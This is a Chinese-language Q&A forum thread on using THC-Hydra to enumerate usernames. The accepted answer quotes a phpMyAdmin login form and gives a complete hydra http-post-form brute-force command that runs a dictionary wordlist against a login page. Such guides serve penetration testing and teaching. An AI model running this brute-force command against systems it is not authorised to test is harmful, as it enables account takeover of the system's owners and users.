@怪人
4年前 提问
3个回答
怎么通过 THC-Hydra 查找用户名
怎么通过THC-Hydra查找用户名
Andrew
4年前
在尝试了用户名/密码组合后,如果响应中不包含单词“ incorrect”,那么hydra认为该用户名/密码组合是正确的。
“登录失败”页面可能不包含您提供的“失败字符串”,而hydra最终认为所有组合的身份验证均成功。
整理,
检查登录失败页面是否具有此关键字
添加该-f标志,以使hydra在第一次成功尝试时终止。
房乐
3年前
通常默认情况下,SQL Server仅允许从本地主机登录
趣能一姐
4年前
官方采纳
通过THC-Hydra查找PhpMyAdmin用户名。登录页面代码为:
<label for="input_username">Username:</label>
<input type="text" name="pma_username" id="input_username" value="" size="24" class="textfield">
</div>
<div class="item">
<label for="input_password">Password:</label>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield">
用下面的命令:
$ hydra -L /usr/share/dict/cracklib-small -p 123 192.168.56.5 http-post-form '/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:incorrect'